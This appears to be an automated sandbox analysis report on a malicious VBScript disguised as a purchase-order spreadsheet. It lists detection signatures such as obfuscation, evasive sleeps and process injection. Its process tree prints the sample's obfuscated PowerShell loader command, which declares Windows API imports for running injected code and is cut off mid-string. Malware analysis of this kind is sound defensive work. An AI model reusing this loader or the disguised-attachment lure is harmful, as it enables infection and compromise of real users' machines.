Edit tour
Windows
Analysis Report
PO-09784893 xlsx.vbs
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 4180 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PO-09 784893 xls x.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - cmd.exe (PID: 5132 cmdline:
CMD.EXE /c echo C:\W indows MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4412 cmdline:
C:\Windows \syswow64\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Saudiarab iske = """ KoAEldMedP o-CeTphySu pLnePh Eg- FrTFoyCeps peGrDTeefa fSaiRenSpi PltSeiUfoS lnRa Je'Dr uBlsLiiMin IngAx AjSm oyTesZatIn eNemUg;Spu LesUniSonU ngMu TrSPo yelsIntHae KomTr.SvRK iuHenHatEg iSimKaeSh. MoICanPitO xeterStoFe pTeSAreEfr SkvFoishcG aeBesFo;Fo pKouBabSel StihocLv M asAftTraRu tSeiBecad MecVelSaaX ysAusBr Os TSehLiwBua KorHutAbnB eeBesBusUn 1Ce Sa{Tr[ MaDAnlOmlS pIVemArpSu oSerUttFr( St`"""PeAU nDOoVEdASt PunIFo3Nd2 La.cuDGeLr uLCi`"""Cl )Bl]Brpasu VibBolIsiu dcWa UnsBe tSuaImtAfi FucBi HaeS lxTotboeTj rSunKt rei VinSotTu S pGReeAftUd SoveLarUdv CoiVacTieS kKSteSayCi NInaWempre Ta(NoiNong rtCo OmNAn oTayMoiCas PllMa,GriA pnIntAl Al SSelLagSpt Sm6Pe9Fo,B iiUrnBetPi KrAIsfFif LiainlPo,m aiBenMotTr AsbTeaGag LaaNy)Ma;S c[SoDChlDe lNgIGomMip tioVarkutP a(Sa`"""Sk gWhdBoiSe3 Vi2Pe`"""S n)Ka]BepKr uRabKllIbi FecSl FosB etAdaArtGr iHvcEm Dre HaxSatSeeA srBrnDa Aa iafnLotOv BeGNaeSotH jCamlRgiBu pSaRmagCon Re(SkiBanR atHe KoMEk uTalLa,Sti aunCetEt T rGMagpyeUn gAnuFi)Wo; Ub[UbDCalE xlStIRomCi pReoCarDyt Tr(Se`"""c akDieSarSe nPleMalbi3 Tr2si`"""T r)Be]JopBr uYabSolAui LacDi DisL jtSkaEmtTu iOvcBe Ate rexSttDreA trFonWe Fl IUnnpatTaP sttVerAr S aEpinLsuMe mUnSHayAbs DotaseTumS pLDroAdcVo aSllSteDks BaWSa(RauS viOpnAltko MevPe1du, MoiUnnHete r PlvSn2Ta )Du;He[CaD FolGylRaIE cmArpAnoBr rQutFe(Li` """SykBaes kravnKaeMi lSk3Mo2de` """Di)Fa]P rpCouBebAn lAfiHycUn AlsHjtHyaD rtMiiUncPi CeeStxKyt KaeAlrKona c ariBlnCa tse HuGSil PsoSebEfaP llEmDMaeSa lHeeSatBre prASmtGuoF imUn(PuiAe nFotDr TeP TrrtleDe1T o5Sa1Co)Sk ;ha[BaDEvl EulTrIDemH opSaoFarNo tTr(Ca`""" AkgPidPliF i3Sc2Re`"" "Aa)Da]Sap EkuApbTalR eiHacPr No soptSraSkt StiSqcAk E neAaxSptFo eTarDenSp AriSenOvtB e FlSFotEn runoAekShe BoABlnTadP aFGeiSolAn lblPOsaAvt unhPr(DiiD dnArtKl Ac EKrtLuhWiy UnlHj8Bl7D u)Bi;Qu[No DKrlUnlEkI ApmEmpSyoi nrGltCy(Sa `"""seuMos PeeafrPa3B l2In`"""Ko )Un]Jrpdiu RebSklNoiS ncSc SpsFu tstaSetFai klcMe UeeD exUdtCoeUn rJanSt ini NonFltRh G rCInlSkoIn sBiePyCDal SuiMopEtbE noTaaTarBe dPa(Ku)Un; Yn[ChDAglL rlOtICamCo pSaoGhrmat Ba(Sp`"""P awTriArnRe sGapDeoAno SplTi.BrdE xrObvSp`"" "Un)Dr]Opp HeuInbUnlC eiCocSt Un sSetCeaFot DiistcMe S tePaxwatla eBrrRenOv PaiStnCotR u PlSEncLu hTeeNodTru talDaedrJM aoPrbTr(Be itynOltkl KnUFanAfoK ovCoeStrEl 2Br2Kl6Re, IniNonRetK o PiaMikWe tStiWa)Mu; Dd[AfDUnlS llspIVomRe pNooTrrCht Ol(Cy`"""G eAAnDPrVEg ALiPSeIFo3 Sp2Re.RyDO vLAjLRe`"" "Do)St]Typ NauRabMelP oilocBu Pl sFitMiapat SciPecTa D ieStxBotDr eHurmenAl MliFanBltC i TrQMouFa eErrAryVoS HaeKorKrvT siLecKueFa CudoAfnPrf liiSugHe(M uiFonpitHo prRTheEng oflEseatrF i,LiiInnGr tFu opCEno gasAc0Ti,B aiMinSttSh